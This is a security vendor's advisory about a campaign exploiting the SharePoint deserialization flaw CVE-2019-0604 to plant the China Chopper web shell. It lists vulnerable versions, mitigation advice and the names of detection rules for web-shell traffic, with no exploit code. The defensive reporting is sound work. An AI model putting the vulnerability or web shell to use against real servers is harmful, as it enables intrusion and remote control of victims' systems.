Trend Micro is aware of a campaign that is targeting several unpatched versions of Microsoft SharePoint Server in order to try and deploy the China Chopper web shell.
It is believed that the campaign is leveraging CVE-2019-0604, a vulnerability originally discovered and disclosed to Microsoft by Markus Wulftange (@mwulftange) working with Trend Micro's Zero Day Initiative, in order to deploy the web shell by exploiting the vulnerability to allow a successful attacker to run arbitrary code in the context of the SharePoint application pool and server farm account.
Microsoft released updates and security guidance for vulnerable versions of SharePoint in February and March of 2019, however, many servers remain unpatched.
Vulnerable Versions of Microsoft SharePoint
The following unpatched versions of Microsoft SharePoint are vulnerable:
- Microsoft SharePoint Server 2019
- Microsoft SharePoint Enterprise Server 2016
- Microsoft SharePoint Foundation 2013 SP1
- Microsoft SharePoint Server 2010 SP2
Mitigation and Protection
The first line of protection against any exploited vulnerability to ensure the affected systems are patched with Microsoft's latest security update. In addition, any SharePoint servers that are designated for corporate intranet or internal use should be sufficiently isolated from the outside Internet.
Trend Micro Detection and Protection
In addition to applying Microsoft's Security Update, Trend Micro provides additional rules and filters to compliment the patch or to help mitigate some risk before affected servers are patched.
Trend Micro Deep Security
- Rule 1009535 - Microsoft SharePoint Remote Code Execution Vulnerability (CVE-2019-0604)
- Rule 1007170 - Identified Suspicious China Chopper Webshell Communication
Trend Micro TippingPoint ThreatDV
- Filter 33692: Microsoft SharePoint EntityInstanceEncoder Insecure Deserialization Vulnerability
- Filter 34152: HTTP: China Chopper PHP Webshell Traffic Detected (My Script RunInBrowser Control Command)
- Filter 34153: HTTP: China Chopper PHP Webshell Traffic Detected (Control Commands)
- Filter 34154: HTTP: China Chopper ASP Webshell Traffic Detected (Control Commands)
- Filter 34257: HTTP: China Chopper ASPX Webshell Traffic Detected (Control Commands)
Trend Micro Deep Discovery Inspector (DDI)
- Rule 2063: CHOPPER - HTTP (Request)
Trend Micro Malware Detection
- Official Pattern Release 15.111.00: contains detection for some known IOCs as Backdoor.ASP.CHOPSHELL.A and a client component executable as BKDR_CHOPPER.B.
- Trend Micro Zero Day Initiative (ZDI) Blog Article: https://www.zerodayinitiative.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
- Trend Micro Malware Report: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Backdoor.ASP.CHOPSHELL.A
- Microsoft Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604
- MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0604
- Canadian Centre for Cyber Security Alert AL19-006: https://cyber.gc.ca/en/alerts/china-chopper-malware-affecting-sharepoint-servers
Trend Micro will continue to monitor this threat and will provide updates as necessary.